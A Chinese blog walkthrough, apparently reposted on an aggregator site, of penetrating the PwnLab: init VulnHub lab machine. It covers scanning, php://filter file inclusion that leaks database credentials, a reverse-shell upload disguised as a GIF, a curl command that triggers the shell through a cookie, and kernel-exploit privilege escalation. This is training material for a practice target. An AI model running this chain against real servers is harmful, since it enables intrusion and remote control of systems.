PWNlab靶机渗透

这篇具有很好参考价值的文章主要介绍了PWNlab靶机渗透。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

安装靶机

下载地址:https://www/vulnhub.com/entry/pwnlab-init,158/

信息收集:

收集靶机ip地址,由于搭建在本地使用kali自带命令

arp-scan -l

PWNlab靶机渗透,网络安全,安全,web安全,渗透

nmap 扫描端口,服务

nmap -sV -p 1-65535 -A 靶机ip地址

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 

漏洞探测

访问80端口地址,查找可利用的功能点

发现存在upload,不过需要登录

发现一个规律每次切换网页时,存在page=,思考是否存在文件包含漏洞

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 PWNlab靶机渗透,网络安全,安全,web安全,渗透

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 发现page=index,网页挂了,证明page=后面的参数可控,试试php伪协议是否可用

file协议:

用法:

file:/ 跟要访问的文件

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 网页没结果

php://filter

php://filter/read=convert.base64-encode/resource=config

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 有一串返回值,使用base_64解密看看

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 信息收集时,发现mysql 3306端口开放,这里试试得到的账号密码是否可用

$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";

成功登录mysql数据库,PWNlab靶机渗透,网络安全,安全,web安全,渗透

 查找有没有可用的账号密码,登录web,利用文件上传webshell

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 拿到账号密码,解密

kent                  JWzXuBJJNy

登录web,尝试上传一句话木马

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 发现存在后缀,以及type类型检测,修改webshell

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 加后缀,GIF

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 成功上传,利用F12查找文件上传路径,

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 尝试使用webshell工具连接,这里我使用的是哥斯拉

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 连接不上

换一个思路,利用kali,自带的php马,改点东西

位置:

/usr/share/webshells/php

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 vim /tmp/php-reverse-shell.php

PWNlab靶机渗透,网络安全,安全,web安全,渗透

文件头改成GIF

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 改个名

名字自取,后缀改成xx.php.gif

尝试上传

同上,查找文件上传路径,用php伪协议查看源码

发现源码里存在'可用Cookie 参数名lang 进行命令执行

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 

kali开启监听,端口为刚刚木马里的端口

nc -lvp 1234                    

利用curl 执行木马

curl -v --cookie:"lang=../upload/7a68f219a5fc219beb832ab642246933.gif" 靶机ip

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 

PWNlab靶机渗透,网络安全,安全,web安全,渗透

 linux提权

信息收集,漏洞探测

说一下思路吧,我的环境有问题,提权这一步执行exp,环境老崩溃,重启后得重新来过

前期:信息收集

使用优秀工具,github一大堆

漏洞探测:

这里推荐一个,linux-exploit-suggester-2,github有直接搜

下载好之后,里面是linux-exploit-suggester-2.pl文件,利用kali开启apache服务,将文件复制到var/www/html

service apache2 start

在webshell页面wget下载,赋予执行权限,跑一下脚本,注意:将文件上传到/tmp目录,老生常谈了,到这里,脚本跑了之后发现存在三个CVE漏洞

利用内核漏洞溢出,利用exp直接getshell,简简单单!文章来源地址https://www.toymoban.com/news/detail-639668.html

到了这里,关于PWNlab靶机渗透的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2023年广东省网络安全竞赛——Web 渗透测试解析(超级详细)

    任务环境说明: √ 服务器场景:Server03 √ 服务器场景操作系统:未知(关闭连接) 通过本地 PC 中的渗透测试平台 Kali 对靶机进行 WEB 渗透,找到页面内的文件上传漏洞并且尝试进行上传攻击,将文件上传成功后的页面回显字符串作为Flag 提交(如:点击超链接查看上传文

    2023年04月08日
    浏览(54)
  • 网络安全B模块(笔记详解)- 利用python脚本进行web渗透测试

    1.使用渗透机场景kali中工具扫描确定Web服务器场景地址,浏览网站Flag.html页面,并将Flag.html中的Flag提交; 扫描发现是8081端口 访问页面查看 Flag:WXL0601 2.进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的Flag1字符串,并将该字符串作为Flag提交;

    2024年01月18日
    浏览(48)
  • 网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag

    实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统

    2024年01月23日
    浏览(40)
  • 网络安全技术新手入门:利用永恒之蓝获取靶机控制权限

    目录 前言 一、搜索永恒之蓝可用模块 二、使用攻击模块 三、配置攻击模块 四、攻击 五、总结 相关法律声明:《中华人民共和国网络安全法》 第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供

    2024年01月20日
    浏览(37)
  • 【网络安全】-- 网络渗透技术攻防(--更新中)

    1.1.1 什么是网络渗透攻击 “网络渗透攻击”是对大型的网络主机服务器群组采用的一种迂回渐进式的攻击方法,通过长期而有计划的逐步渗透攻击进入网络,最终控制整个网络。 1.1.2 网络渗透测试的意义 渗透测试是受信任的第三方进行的一种评估网络安全的活动,它通过运

    2024年02月13日
    浏览(53)
  • 网络安全—综合渗透实验

    综合实验 【实验描述】 随着互联网的普及和快速发展,互联网产品多样化、迭代快的特点为一些企业赢得了机会,同样也给企业带来了众多安全问题。如网络安全、系统安全、web安全、数据安全等。 本实验模拟企业复杂网络、复杂应用环境,通过数据包分析、漏洞挖掘、渗

    2024年02月15日
    浏览(49)
  • 网络安全渗透测试实验一

    理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);

    2023年04月26日
    浏览(52)
  • 网络攻击(一)--安全渗透简介

    目标 了解渗透测试的基本概念 了解渗透测试从业人员的注意事项 在了解渗透测试之前,我们先看看,信息安全相关的法律是怎么样的 中华人民共和国网络安全法 《中华人民共和国网络安全法》由全国人民代表大会常务委员会于2016年11月7日发布, 自2017年6月1日起施行 。 中

    2024年02月04日
    浏览(43)
  • 网络安全--Kali渗透Windows

    这里我们学习使用Kali攻击机来渗透Windows,这里使用的是msfvenom木马来进行渗透。 命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe -o payload.exe 这里说明一下,-p 是指使用的工具模块,lhost是本机的IP地址,lport是本机的端口, -f 是指生成什么样的文件,简称指定

    2024年02月05日
    浏览(50)
  • 2023年网络安全竞赛——网页渗透

    网页渗透 任务环境说明:  服务器场景:Server2120  服务器场景操作系统:未知(封闭靶机)  用户名:未知 密码:未知 访问服务器的网站主页,猜测后台数据库中本网页中应用的库名称长度,将长度作为flag提交; 通过扫描发现靶机开放80端口,直接访问80 尝试输入一个

    2024年02月09日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包